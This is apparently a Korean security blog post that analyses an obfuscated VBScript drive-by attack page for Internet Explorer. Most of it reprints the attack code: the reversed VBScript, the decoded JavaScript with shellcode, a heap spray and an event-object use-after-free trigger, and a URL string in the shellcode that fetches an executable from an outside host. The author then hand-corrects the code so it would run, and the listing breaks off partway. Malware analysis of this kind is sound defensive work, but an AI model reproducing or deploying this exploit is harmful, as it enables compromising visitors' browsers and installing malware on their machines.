본문 바로가기

어느 한 분야를 전문적으로 연구함. 또는 그 분야./정보를 여러가지 위협으로부터 보호

Vbscript Obfuscated

이번 난독화는 vbscript로 만들어진 난독화입니다. 실제 실행되는 html 소스가 역순으로 저장되어 있고, UTF-8로 볼 수 있는 특수문자가 포함되어 있습니다.


실제로 이 코드는 실행되지 않고 오류가 발생하지만, 공격을 위한 소스코드이며 분석해볼만큼 재미있는 형태이기 때문에 분석해 보았습니다.


<SCRIPT language=vbscript>
wei="มี>lmth/<>ydob/<>naps/<>"")tneve(1ve""=daolno ""fig.lty""=CRS GMI<>""1ps""=di naps<มี>tpircs/<มี}มี}มี;tnemelEcrs.1e = t rav มี;} มี;p = atad.]i[1x มี{ มี) ++ i ;htgnel.1x < i ;0 = i( rof มี;""d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\d0c0u\""=p {มี)(2ve noitcnufมี}มี;)05 ,2ve(lavretnItes.wodniw มี;"""" = LMTHrenni.)""1ps""(dIyBtnemelEteg.tnemucod มี;)tve(tcejbOtnevEetaerc.tnemucod = 1e มี{มี)tve(1ve noitcnufมี;llun = 1e ravมี;}มี;""cba"" = atad.]i[1x มี;)""TNEMMOC""(tnemelEetaerc.tnemucod = ]i[1x มี{มี) ++ i ;005 < i ;0 = i( rofมี;)(yarrA wen = 1x ravมี มี}มี;cs + n = ]i[x มี{) ++ i ;002 < i ;0 = i rav( rofมี;)(yarrA wen = x ravมี;)htgnel.cs - 962425 ,0(gnirtsbus.n = nมี;n =+ n)882425 =< htgnel.n( elihwมี;)""d0c0u%d0c0u%""(epacsenu = n ravมีมี;u+s=cs ravมี;)""0000u%8756u%E256u%F213u%5647u%E2E6u%7717u%7737u%F217u%A3F2u%4707u%8647u%""(TY=u ravมีมี;)pvaTY+""305Cu%40B8u%E3B8u%""(TY=+sมี;)""30DDu%A5C1u%E3B8u%C0B4u%E3B8u%DD66u%4230u%B8A5u%""+naittYUY+""FCD0u%701Cu%0C47u%""(TY=+sมีมี;)""CA48u%0CCFu%FF33u%5F33u%B830u%B843u%94E3u%3EB3u%30DDu%A502u%E3B8u%A481u%E3B8u%305Du%8287u%B845u%C363u%""(TY=+sมีมี;)""B854u%4263u%C642u%63B8u%3C06u%04C3u%E3B8u%0CC7u%4338u%B804u%B0E3u%3CBEu%0480u%E3B8u%C1DAu%B807u%C0E3u%""(TY=+sมี;)""B804u%01E3u%0C87u%0358u%B804u%0C46u%3C33u%4C80u%0038u%0000""+u_TY+""8EA2u%CE05u%E4E0u%86E8u%0000""+u_TY+""F000u%3C8Eu%""(TY=+sมี;)""4C80u%0038u%0000""+u_TY+""8EE3u%5005u%FEF4u%86F4u%FFFF""+u_TY+""9ADFu%3C8Eu%FFFF""+u_TY+""8EFFu%FF8Eu%CFFFu%9E5Bu%FFFF""+u_TY+""BAEFu%""(TY=+sมี;)""058Eu%FFFF""+u_TY+""0EBFu%058Eu%A656u%BE31u%FFFF""+u_TY+""44EFu%3C8Eu%4C80u%0038u%0000""+u_TY+""8E27u%6105u%EF3Bu%8627u%0000""+u_TY+""""(TY=+sมี;)""7500u%3C8Eu%4C80u%0038u%0000""+u_TY+""8E68u%3B05u%425Cu%8686u%FFFF""+u_TY+""24EFu%3C8Eu%4C80u%0038u%0000""+u_TY+""8EA9u%3A05u%""(TY=+sมีมี;)""9C2Eu%8679u%FFFF""+u_TY+""65EFu%3C8Eu%4C80u%0038u%0000""+u_TY+""8EEAu%4905u%B503u%860Eu%FFFF""+u_TY+""A6EFu%3C8Eu""+""%4C80u""+""%""+""0""+""0""+""3""+""8""+""u""+""%""(TY=+sมีมี;)""0""+""0""+""00u%8E2Cu%2005u%A7E1u%86A1u%FFFF""+u_TY+""E7EFu%3C8Eu%4C80u%0038u%0000""+u_TY+""8E6Du%BB05u%0A5Bu%8675u%FFFF""+u_TY+""29EFu%3C8Eu%""(TY=+s ;)""4C80u%0038u%0000""+u_TY+""8EAEu%5305u%9FBBu%86E9u%0000""+u_TY+""FC00u%3C8Eu%4C80u%0038u%0000""+u_TY+""8EEFu%3705u%8D2Eu%86E7u%""(TY=+sมีมี;)""0000""+u_TY+""3E00u%3C8Eu%4C80u%0038u%1000u%8E21u%2005u%7918u%8695u%FFFF""+u_TY+""7AEFu%3C8Eu%4C80u%0038u%1000u%8E62u%""(TY=+sมีมี;)""E105u%E5B9u%86BAu%FFFF""+u_TY+""63FFu%3C8Eu%4C80u%0038u%1000u%8EA3u%BD05u%94D2u%860Bu%0000""+u_TY+""F110u%3C8Eu%4C80u%""(TY=+sมีมี;)""0038u%1000u%8EE4u%0605u%EC0Eu%86FEu%0000""+u_TY+""3310u%3C8Eu%4C80u%0038u%1000u%8E26u%C105u%86BDu%8687u%FFFF""+u_TY+""""(TY=+sมี;)""7FEFu%3C8Eu%4C80u%0038u%1000u%8E67u%F505u%A840u%860Fu%0000""+u_TY+""B510u%3C8Eu%4C80u%0038u%1000u%8EA8u%6305u%""(TY=+sมีมี;)""65FEu%86DEu%0000""+u_TY+""F610u%3C8Eu%4C80u%0038u%1000u%8EE9u%C705u%CFD0u%86AAu%0000""+u_TY+""3810u%3C8Eu%4C80u%0038u%""(TY=+sมีมี;)""1000u%8E2Bu%C005u%7930u%86CEu%0000""+u_TY+""7910u%3C8Eu%4C80u%0038u%1000u%8E6Cu%9705u%6C64u%86B1u%0000""+u_TY+""BA10u%""(TY=+sมีมี;)""3C8Eu%4C40u%FF38u%FFFF""+u_TY+""8E6Eu%FFFF""+u_TY+""04EFu%009Eu%1000u%8EAAu%FF05u%DFFFu%8EB6u%4005u%4442u%51D8u%00BEu%""(TY=+sมีมี;)""7687u%8667u%803Cu%384Cu%FFFF""+u_TY+""6EFFu%FF8Eu%EFFFu%9E56u%0000""+u_TY+""FC10u%058Eu%FFFF""+u_TY+""09DFu%058Eu%4240u%D844u%""(TY=+sมี;)""BE51u%46F6u%3786u%0086u%6777u%8636u%803Cu%384Cu%FFFF""+u_TY+""6EFFu%FF8Eu%EFFFu%9EF8u%0000""+u_TY+""9F10u%058Eu%FFFF""+u_TY+""""(TY=+sมี;)""ABDFu%058Eu%4240u%D844u%BE51u%5627u%5737u%0086u%2300u%8633u%803Cu%384Cu%FFFF""+u_TY+""6EFFu%FF8Eu%EFFFu%9E9Bu%""(TY=+sมี;)""0000""+u_TY+""3220u%058Eu%FFFF""+u_TY+""""+TYnaituy+""46C6u%E647u%C686u%3CA6u%4C80u%FF38u%FFFF""+u_TY+""8E6Eu%""(TY=+sมีมี;)""FFFF""+u_TY+""0EEFu%009Eu%2000u%8EA4u%FF05u%EFFFu%8EB0u%4005u%4442u%51D8u%D6BEu%27C6u%8657u%0000""+u_TY+""F6E6u%3C86u%""(TY=+sมี;)""0000""+u_TY+""1000u%E58Bu%01F5u%384Cu%FF0Du%0000""+u_TY+""FE10u%C18Eu%4742u%E3FFu%FF00u%02E3u%4442u%63B8u%4780u%B38Fu%""(TY=+sมี;)""FF0Du%0000""+u_TY+""BC10u%8F8Eu%0DB8u%00FFu%2000u%8E42u%4202u%FF47u%00E3u%F2A6u%6A57u%003Fu%0000""+u_TY+""9B80u%B84Fu%""(TY=+sมีมี;)""6427u%9454u%0086u%D656u%8616u%B8CFu%FF0Du%0000""+u_TY+""D520u%418Eu%FF77u%75E3u%A680u%B8CFu%CE80u%7538u%FF65u%""(TY=+sมี;)""FFFF""+u_TY+""8E9Fu%853Cu%BE20u%B53Cu%E5F5u%0D85u%75FFu%33FFu%0000""+u_TY+""B020u%A08Eu%0077u%C342u%6308u%FF0Du%0000""+u_TY+""""(TY=+sมีมี;)""5520u%058Eu%0000""+u_TY+""E100u%458Eu%0C05u%6533u%3575u%FFFF""+u_TY+""1DEFu%0D8Eu%00FFu%0000""+u_TY+""86FFu%0000""+u_TY+""BF10u%0D8Eu%""(TY=+sมี;)""75FFu%33FFu%0000""+u_TY+""1420u%A08Eu%0077u%C342u%6308u%FF0Du%0000""+u_TY+""B820u%058Eu%0000""+u_TY+""4500u%458Eu%0C05u%FF33u%""(TY=+sมี;)""FFFF""+u_TY+""8E40u%C000u%082Cu%1040u%8B11u%FFFF""+u_TY+""11FFu%3C8Eu%FFFF""+u_TY+""71FFu%0E8Eu%50FFu%D804u%B8CEu%6055u%0947u%""(TY=+sมี;)""0""+""9""+""1""+""4""+""u%5009u%1887u%57F0u%838Eu%5008u%9E47u%0883u%FF0Du%3535u%3535u%33BDu%0000""+u_TY+""9330u%FF8Eu%FFFF""+u_TY+""0A06u%""(TY=+sมีมี;)""00D8u%0000""+u_TY+""1A40u%0046u%0000""+u_TY+""8E91u%""+VTMTY+""0505u%3505u%0015u%0000""+u_TY+""C210u%7C34u%""(TY=+sมีมี;)""0CE3u%0133u%383Cu%B89Du%B8CCu%BE2Fu%0C40u%8038u%98C1u%90E3u%45D7u%388Fu%B8CCu%33BDu%330Cu%CE45u%2038u%""(TY=+sมีมี;)""8805u%2DE3u%2233u%0022u%E37Cu%6F66u%04BEu%4730u%48BDu%A881u%80E3u%380Cu%B87Cu%B8CFu%0000""+u_TY+""2700u%008Eu%""(TY=+sมี;)""3000u%8E8Cu%3505u%0025u%1000u%8640u%0505u%330Cu%2C01u%2238u%3602u%C0F2u%7C24u%02E3u%D646u%8036u%7C24u%""(TY=+sมีมี;)""22E3u%3602u%40F2u%7C24u%02E3u%D646u%2036u%E37Cu%B84Du%0000""+u_TY+""4110u%18CEu%00B5u%4000u%9ECAu%0E3Cu%""(TY=+sมีมี;)""5""+""0""+""F""+""Fu%7C74u%66E3u%F510u%E398u%708Bu%E36Cu%3CB5u%FFF5u%D874u%2FEAu%3CCFu%0C0Bu%9433u%339Cu%B88Fu%0000""+u_TY+""3540u%758Eu%""(TY=+sมีมี;)""853Cu%0000""+u_TY+""2E00u%008Eu%2000u%8E0Bu%0075u%0100u%8600u%A602u%CD35u%35B8u%853Cu%0000""+u_TY+""AF00u%008Eu%2000u%8E8Cu%0075u%""(TY=+sมี;)""0100u%8600u%A604u%CD35u%35B8u%BE85u%0000""+u_TY+""A100u%008Eu%1000u%8E87u%0000""+u_TY+""C000u%8F8Eu%00B8u%3000u%8E0Au%0000""+u_TY+""0300u%""(TY=+sมี;)""008Eu%1000u%8EB5u%0000""+u_TY+""2200u%8F8Eu%00B8u%3000u%8E2Fu%0000""+u_TY+""6400u%008Eu%1000u%8E46u%0000""+u_TY+""8300u%8F8Eu%00B8u%3000u%""(TY=+sมีมี;)""8E45u%FFFF""+u_TY+""6FFFu%0D8Eu%4AFFu%E53Fu%BE50u%B88Fu%0000""+u_TY+""0080u%0D9Bu%00FFu%00A6u%0200u%8600u%0000""+u_TY+""D430u%098Eu%""(TY=s ravมี;""FDE3u%8257u%C742u%63B3u%BE4Fu%308Fu%""=naittYUY ravมี;""4EDFu%058Eu%4240u%D844u%BE51u%""=TYnaituy ravมี;""0000""+u_TY+""B330u%058Eu%0575u%0505u%""=VTMTY ravมี;""FFFF""+u_TY+""F4BFu%3C8Eu%C116u%4442u%6398u%""=pvaTY ravมี;""u%""=u_TY ravมี;epacsenu=TY ravมี;)(gnirtSTMGot.seripxe+""=seripxe;/=htap;seY=FSevolTY""=eikooc.tnemucodมี;)0001*06*06*42+)(emiTteg.seripxe(emiTtes.seripxeมี;)(etaD wen=seripxe ravมีมี{มี)1-==)""=FSevolTY""(fOxedni.eikooc.tnemucod(fiมี};eurt nruter{)(noitcnuf=rorreno.wodniwมี>tpircs<>lmth<"
function UnEncode(cc)
for i = 1 to len(cc)
if mid(cc,i,1)<>"มี" then
temp = Mid(cc, i, 1) + temp
else
temp=vbcrlf&temp
end if
next
UnEncode=temp
end function
document.write(UnEncode(wei))
</SCRIPT>

มี 라는 문자는 구글 번역기로 돌려본 결과 "태국어 : 있다" 라는 의미를 가지고 있습니다.


간단하게 xmp을 이용하여 난독화를 풀면 다음과 같은 결과를 볼 수 있습니다. vbscript이기 때문에 IE에서만 동작합니다.


<html><script>??window.onerror=function(){return true;}??if(document.cookie.indexOf("YTloveSF=")==-1)??{????var expires=new Date();??expires.setTime(expires.getTime()+24*60*60*1000);??document.cookie="YTloveSF=Yes;path=/;expires="+expires.toGMTString();??var YT=unescape;??var YT_u="%u";??var YTavp="%u8936%u2444%u611C%uE8C3%uFB4F"+YT_u+"FFFF";??var YTMTV="%u5050%u5750%uE850%u033B"+YT_u+"0000";??var yutianYT="%u15EB%u448D%u0424%uE850%uFDE4";??var YUYttian="%uF803%uF4EB%u3B36%u247C%u7528%u3EDF";??var s=YT("%uE890%u034D"+YT_u+"0000%u0068%u0020%u6A00%uFF00%uB9D0%u0800"+YT_u+"0000%uF88B%u05EB%uF35E%uFFA4%uE8D0%uFFF6"+YT_u+"FFFF%u54E8");????s+=YT("%u0003%u8B00%uE8F8%u0038"+YT_u+"0000%u64E8%u0001%uE800%u0046"+YT_u+"0000%uF2E8%u0003%u8B00%uE8F8%u0022"+YT_u+"0000%u5BE8%u0001%uE800");??s+=YT("%u0030"+YT_u+"0000%uA0E8%u0003%u8B00%uE8F8%u000C"+YT_u+"0000%u78E8%u0001%uE800%u001A"+YT_u+"0000%u58EB%u8B53%u53DC%u406A%u0068%u0010");??s+=YT("%u5700%uC8E8%u0002%uE800%u00FA"+YT_u+"0000%uC358%u8B53%u53DC%u206A%u0068%u0010%u5700%uB0E8%u0002%uE800%u00E2"+YT_u+"0000%uC358");????s+=YT("%uE857%u0453"+YT_u+"0000%uF88B%uC933%u3349%uB0C0%uFCC3%uAEF2%u478D%u5FFF%u5BC3%uC63E%uB807%u893E%u015F%u3E66%u47C7%uF"+"F"+"0"+"5");????s+=YT("%uC3E0%uACE9%u0004%u5B00%uEC81%u0114"+YT_u+"0000%uD48B%uC73E%u6302%u646D%u3E20%u42C7%u2F04%u2063%u3E22");????s+=YT("%u42C7%u6308%u646D%u3E20%u42C7%u2F0C%u2063%u8322%u10C2%uC033%u5050%u0468%u0001%u5200%u5053%uC8E8%u0003");??s+=YT("%uE800%u0072"+YT_u+"0000%uFC8B%uC78B%uC083%u3E08%u188A%uDB84%u0374%uEB40%u66F6%uC73E%u2200%u3322%u3ED2%u5088");????s+=YT("%u8302%u54EC%uC033%uDB33%uCC8B%uF883%u7D54%u3E09%u1C89%u8308%u04C0%uF2EB%uCC8B%uD98B%uC383%u3310%u3EC0");????s+=YT("%u43C7%u012C"+YT_u+"0000%u5100%u5053%u5050"+YTMTV+"%u19E8"+YT_u+"0000%u6400%u04A1"+YT_u+"0000%u8D00");????s+=YT("%u60A0"+YT_u+"FFFF%uE8FF%u0339"+YT_u+"0000%uDB33%u5353%u5353%uD0FF%u3880%u74E9%u8005%uE838%u0F75%u7881%u9005%u"+"4"+"1"+"9"+"0");??s+=YT("%u7490%u5506%uEC8B%u408D%uFF05%uE8E0%uFF17"+YT_u+"FFFF%uE8C3%uFF11"+YT_u+"FFFF%u11B8%u0401%uC280%u000C%u04E8"+YT_u+"FFFF");??s+=YT("%u33FF%u50C0%uE854%u0054"+YT_u+"0000%uE850%u028B"+YT_u+"0000%uD0FF%u8036%u243C%u7700%uE80A%u0241"+YT_u+"0000%uFF33%uFF57");??s+=YT("%uE8D0%u01FB"+YT_u+"0000%uFF68"+YT_u+"0000%uFF00%uE8D0%uFED1"+YT_u+"FFFF%u5753%u3356%u50C0%uE854%u001E"+YT_u+"0000%uE850%u0255");????s+=YT(""+YT_u+"0000%uD0FF%u8036%u243C%u7700%uE80A%u020B"+YT_u+"0000%uFF33%uFF57%u58D0%u5F5E%uC35B%u02EB%uC358%uF9E8"+YT_u+"FFFF");??s+=YT("%u56FF%u8357%u08EC%uFC8B%u086A%u3E57%u77FF%uE814%u025D"+YT_u+"0000%uD0FF%uFC8B%u6168%u656D%u6800%u4549%u7246");????s+=YT("%uF48B%u08B9"+YT_u+"0000%uF300%u75A6%u6A2F%u3E00%u74FF%u2024%u24E8%u0002%uFF00%u8BD0%uE8F8%u01CB"+YT_u+"0000%uD0FF");??s+=YT("%uF83B%u0874%u8B36%u2444%u3E20%u00FF%uFF3E%u2474%uE81C%u01EF"+YT_u+"0000%uD0FF%uC483%u5F10%uB85E%u0001"+YT_u+"0000");??s+=YT("%u68C3%u6E6F"+YT_u+"0000%u7568%u6C72%uEB6D%u8D15%u2444%u5004%u0BE8%uFFFE%u50FF%u4AE8%u0002%uE900%uFEE0"+YT_u+"FFFF");????s+=YT("%uE6E8"+YT_u+"FFFF%u83FF%u08C4%u6AC3%u686C%u746E%u6C64"+yutianYT+""+YT_u+"FFFF%uE850%u0223"+YT_u+"0000");??s+=YT("%uB9E9%uFFFE%uE8FF%uFFE6"+YT_u+"FFFF%uC483%uC308%u3368%u0032%u6800%u7375%u7265%u15EB%u448D%u0424%uE850%uFDBA");??s+=YT(""+YT_u+"FFFF%uE850%u01F9"+YT_u+"0000%u8FE9%uFFFE%uE8FF%uFFE6"+YT_u+"FFFF%uC483%uC308%u6368%u7776%u6800%u6873%u6F64%u15EB");??s+=YT("%u448D%u0424%uE850%uFD90"+YT_u+"FFFF%uE850%u01CF"+YT_u+"0000%u65E9%uFFFE%uE8FF%uFFE6"+YT_u+"FFFF%uC483%uC308%u7668%u7867");????s+=YT("%uEB00%u8D15%u2444%u5004%u6BE8%uFFFD%u50FF%uAAE8%u0001%uE900%uFE40"+YT_u+"FFFF%uE6E8"+YT_u+"FFFF%u83FF%u04C4%uE8C3");????s+=YT("%u01AB"+YT_u+"0000%u1B68%u46C6%u5079%uC6E8%u0001%u8300%u08C4%uE8C3%u0197"+YT_u+"0000%uEC68%u0397%u500C%uB2E8%u0001");????s+=YT("%u8300%u08C4%uE8C3%u0183"+YT_u+"0000%uAA68%u0DFC%u507C%u9EE8%u0001%u8300%u08C4%uE8C3%u016F"+YT_u+"0000%uED68%uEF56");????s+=YT("%u5036%u8AE8%u0001%u8300%u08C4%uE8C3%u015B"+YT_u+"0000%uF068%u048A%u505F%u76E8%u0001%u8300%u08C4%uE8C3%uFEF7");??s+=YT(""+YT_u+"FFFF%u7868%uDB68%u501C%u62E8%u0001%u8300%u08C4%uE8C3%u0133"+YT_u+"0000%uEF68%uE0CE%u5060%u4EE8%u0001%u8300");????s+=YT("%u08C4%uE8C3%u011F"+YT_u+"0000%uB068%u2D49%u50DB%u3AE8%u0001%u8300%u08C4%uE8C3%uFF36"+YT_u+"FFFF%uAB68%u9B5E%u501E");????s+=YT("%u26E8%u0001%u8300%u08C4%uE8C3%uFEA7"+YT_u+"FFFF%u5968%u8197%u5002%u12E8%u0001%u8300%u08C4%uE8C3%u00E3"+YT_u+"0000");????s+=YT("%u7E68%uE2D8%u5073%uFEE8"+YT_u+"0000%u8300%u08C4%uE8C3%u00CF"+YT_u+"0000%u9E68%uBBF9%u5035%uEAE8"+YT_u+"0000%u8300%u08C4"); s+=YT("%uE8C3%uFE92"+YT_u+"FFFF%u5768%uB5A0%u50BB%uD6E8"+YT_u+"0000%u8300%u08C4%uE8C3%uFE7E"+YT_u+"FFFF%u1A68%u1E7A%u5002%uC2E8%u00"+"0"+"0");????s+=YT("%"+"u"+"8"+"3"+"0"+"0"+"%"+"u08C4%"+"uE8C3%uFE6A"+YT_u+"FFFF%uE068%u305B%u5094%uAEE8"+YT_u+"0000%u8300%u08C4%uE8C3%uFE56"+YT_u+"FFFF%u9768%uE2C9");????s+=YT("%u50A3%u9AE8"+YT_u+"0000%u8300%u08C4%uE8C3%uFE42"+YT_u+"FFFF%u6868%uC524%u50B3%u86E8"+YT_u+"0000%u8300%u08C4%uE8C3%u0057");??s+=YT(""+YT_u+"0000%u7268%uB3FE%u5016%u72E8"+YT_u+"0000%u8300%u08C4%uE8C3%uFE44"+YT_u+"FFFF%u13EB%u656A%uE850%uFBE0"+YT_u+"FFFF%uE850");??s+=YT("%uFEAB"+YT_u+"FFFF%uB5E9%uFFFC%uE8FF%uFFE8"+YT_u+"FFFF%uE8C3%uFDA9"+YT_u+"FFFF%u4F68%u4FEF%u5005%u3EE8"+YT_u+"0000%u8300%u08C4");??s+=YT("%uE8C3%u000F"+YT_u+"0000%u8E68%u0E4E%u50EC%u2AE8"+YT_u+"0000%u8300%u08C4%u33C3%u64C0%u408B%u8530%u78C0%u3E10%u408B");??s+=YT("%u3E0C%u708B%uAD1C%u8B3E%u0840%uEBC3%u3E0B%u408B%u8334%u7CC0%u8B3E%u3C40%u60C3%u8B36%u246C%u3624%u458B");????s+=YT("%u363C%u548B%u7828%uD503%u8B3E%u184A%u8B3E%u205A%uDD03%u3BE3%u3E49%u348B%u038B%u33F5%u33FF%uFCC0%u84AC");????s+=YT("%u74C0%uC107%u0DCF"+YUYttian+"%u5A8B%u0324%u66DD%u8B3E%u4B0C%u8B3E%u1C5A%uDD03");??s+=YT("%u8B3E%u8B04%uC503"+YTavp);????var u=YT("%u7468%u7074%u2F3A%u712F%u7377%u7177%u6E2E%u7465%u312F%u652E%u6578%u0000");??var sc=s+u;????var n = unescape("%u0c0d%u0c0d");??while (n.length <= 524288)n += n;??n = n.substring(0, 524269 - sc.length);??var x = new Array();??for (var i = 0; i < 200; i ++ ){?? x[i] = n + sc;??}?? ??var x1 = new Array();??for (i = 0; i < 500; i ++ )??{?? x1[i] = document.createElement("COMMENT");?? x1[i].data = "abc";??};??var e1 = null;??function ev1(evt)??{?? e1 = document.createEventObject(evt);?? document.getElementById("sp1").innerHTML = "";?? window.setInterval(ev2, 50);??}??function ev2()??{ p="\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";?? for (i = 0; i < x1.length; i ++ )?? {?? x1[i].data = p;?? };?? var t = e1.srcElement;??}??}??</script>??<span id="sp1"><IMG SRC="ytl.gif" onload="ev1(event)"></span></body></html>??

1. มี(UTF-8 문제로 ??로 표시됨)를 제거하는 구문이 존재하지 않음. 수동으로 제거.

2. YT_u 변수는 "%u"를 의미함.

3. 실행에 있어 잘못된 부분들 일부 수정


위 세 조건을 수동으로 처리하면 다음과 같은 결과가 나옵니다.

<html>
    <script>
    window.onerror = function () { 
    return true; 
    }
     if (document.cookie.indexOf("YTloveSF=") == -1)
     {
         var expires = new Date();
         expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
         document.cookie = "YTloveSF=Yes";
         path=/;expires=expires.toGMTString();/
         var YT = unescape; 
         var YTavp ="%u8936%u2444%u611C%uE8C3%uFB4F%uFFFF";
         var YTMTV = "%u5050%u5750%uE850%u033B%u0000";
         var yutianYT = "%u15EB%u448D%u0424%uE850%uFDE4";
         var YUYttian = "%uF803%uF4EB%u3B36%u247C%u7528%u3EDF";
         var s = YT("%uE890%u034D%u0000%u0068%u0020%u6A00%uFF00%uB9D0%u0800%u0000%uF88B%u05EB%uF35E%uFFA4%uE8D0%uFFF6%uFFFF%u54E8");
         s += YT("%u0003%u8B00%uE8F8%u0038%u0000%u64E8%u0001%uE800%u0046%u0000%uF2E8%u0003%u8B00%uE8F8%u0022%u0000%u5BE8%u0001%uE800");
         s += YT("%u0030%u0000%uA0E8%u0003%u8B00%uE8F8%u000C%u0000%u78E8%u0001%uE800%u001A%u0000%u58EB%u8B53%u53DC%u406A%u0068%u0010");
         s += YT("%u5700%uC8E8%u0002%uE800%u00FA%u0000%uC358%u8B53%u53DC%u206A%u0068%u0010%u5700%uB0E8%u0002%uE800%u00E2%u0000%uC358");
         s += YT("%uE857%u0453%u0000%uF88B%uC933%u3349%uB0C0%uFCC3%uAEF2%u478D%u5FFF%u5BC3%uC63E%uB807%u893E%u015F%u3E66%u47C7%uFF05");
         s += YT("%uC3E0%uACE9%u0004%u5B00%uEC81%u0114%u0000%uD48B%uC73E%u6302%u646D%u3E20%u42C7%u2F04%u2063%u3E22");
         s += YT("%u42C7%u6308%u646D%u3E20%u42C7%u2F0C%u2063%u8322%u10C2%uC033%u5050%u0468%u0001%u5200%u5053%uC8E8%u0003");
         s += YT("%uE800%u0072%u0000%uFC8B%uC78B%uC083%u3E08%u188A%uDB84%u0374%uEB40%u66F6%uC73E%u2200%u3322%u3ED2%u5088");
         s += YT("%u8302%u54EC%uC033%uDB33%uCC8B%uF883%u7D54%u3E09%u1C89%u8308%u04C0%uF2EB%uCC8B%uD98B%uC383%u3310%u3EC0");
         s += YT("%u43C7%u012C%u0000%u5100%u5053%u5050"+YTMTV+"%u19E8%u0000%u6400%u04A1%u0000%u8D00");
         s += YT("%u60A0%uFFFF%uE8FF%u0339%u0000%uDB33%u5353%u5353%uD0FF%u3880%u74E9%u8005%uE838%u0F75%u7881%u9005%u4190");
         s += YT("%u7490%u5506%uEC8B%u408D%uFF05%uE8E0%uFF17%uFFFF%uE8C3%uFF11%uFFFF%u11B8%u0401%uC280%u000C%u04E8%uFFFF");
         s += YT("%u33FF%u50C0%uE854%u0054%u0000%uE850%u028B%u0000%uD0FF%u8036%u243C%u7700%uE80A%u0241%u0000%uFF33%uFF57");
         s += YT("%uE8D0%u01FB%u0000%uFF68%u0000%uFF00%uE8D0%uFED1%uFFFF%u5753%u3356%u50C0%uE854%u001E%u0000%uE850%u0255");
         s += YT("%u0000%uD0FF%u8036%u243C%u7700%uE80A%u020B%u0000%uFF33%uFF57%u58D0%u5F5E%uC35B%u02EB%uC358%uF9E8%uFFFF");
         s += YT("%u56FF%u8357%u08EC%uFC8B%u086A%u3E57%u77FF%uE814%u025D%u0000%uD0FF%uFC8B%u6168%u656D%u6800%u4549%u7246");
         s += YT("%uF48B%u08B9%u0000%uF300%u75A6%u6A2F%u3E00%u74FF%u2024%u24E8%u0002%uFF00%u8BD0%uE8F8%u01CB%u0000%uD0FF");
         s += YT("%uF83B%u0874%u8B36%u2444%u3E20%u00FF%uFF3E%u2474%uE81C%u01EF%u0000%uD0FF%uC483%u5F10%uB85E%u0001%u0000");
         s += YT("%u68C3%u6E6F%u0000%u7568%u6C72%uEB6D%u8D15%u2444%u5004%u0BE8%uFFFE%u50FF%u4AE8%u0002%uE900%uFEE0%uFFFF");
         s += YT("%uE6E8%uFFFF%u83FF%u08C4%u6AC3%u686C%u746E%u6C64"+yutianYT+"%uFFFF%uE850%u0223%u0000");
         s += YT("%uB9E9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u3368%u0032%u6800%u7375%u7265%u15EB%u448D%u0424%uE850%uFDBA");
         s += YT("%uFFFF%uE850%u01F9%u0000%u8FE9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u6368%u7776%u6800%u6873%u6F64%u15EB");
         s += YT("%u448D%u0424%uE850%uFD90%uFFFF%uE850%u01CF%u0000%u65E9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u7668%u7867");
         s += YT("%uEB00%u8D15%u2444%u5004%u6BE8%uFFFD%u50FF%uAAE8%u0001%uE900%uFE40%uFFFF%uE6E8%uFFFF%u83FF%u04C4%uE8C3");
         s += YT("%u01AB%u0000%u1B68%u46C6%u5079%uC6E8%u0001%u8300%u08C4%uE8C3%u0197%u0000%uEC68%u0397%u500C%uB2E8%u0001");
         s += YT("%u8300%u08C4%uE8C3%u0183%u0000%uAA68%u0DFC%u507C%u9EE8%u0001%u8300%u08C4%uE8C3%u016F%u0000%uED68%uEF56");
         s += YT("%u5036%u8AE8%u0001%u8300%u08C4%uE8C3%u015B%u0000%uF068%u048A%u505F%u76E8%u0001%u8300%u08C4%uE8C3%uFEF7");
         s += YT("%uFFFF%u7868%uDB68%u501C%u62E8%u0001%u8300%u08C4%uE8C3%u0133%u0000%uEF68%uE0CE%u5060%u4EE8%u0001%u8300");
         s += YT("%u08C4%uE8C3%u011F%u0000%uB068%u2D49%u50DB%u3AE8%u0001%u8300%u08C4%uE8C3%uFF36%uFFFF%uAB68%u9B5E%u501E");
         s += YT("%u26E8%u0001%u8300%u08C4%uE8C3%uFEA7%uFFFF%u5968%u8197%u5002%u12E8%u0001%u8300%u08C4%uE8C3%u00E3%u0000");
         s += YT("%u7E68%uE2D8%u5073%uFEE8%u0000%u8300%u08C4%uE8C3%u00CF%u0000%u9E68%uBBF9%u5035%uEAE8%u0000%u8300%u08C4");
         s += YT("%uE8C3%uFE92%uFFFF%u5768%uB5A0%u50BB%uD6E8%u0000%u8300%u08C4%uE8C3%uFE7E%uFFFF%u1A68%u1E7A%u5002%uC2E8%u0000");
         s += YT("%u8300%u08C4%uE8C3%uFE6A%uFFFF%uE068%u305B%u5094%uAEE8%u0000%u8300%u08C4%uE8C3%uFE56%uFFFF%u9768%uE2C9");
         s += YT("%u50A3%u9AE8%u0000%u8300%u08C4%uE8C3%uFE42%uFFFF%u6868%uC524%u50B3%u86E8%u0000%u8300%u08C4%uE8C3%u0057");
         s += YT("%u0000%u7268%uB3FE%u5016%u72E8%u0000%u8300%u08C4%uE8C3%uFE44%uFFFF%u13EB%u656A%uE850%uFBE0%uFFFF%uE850");
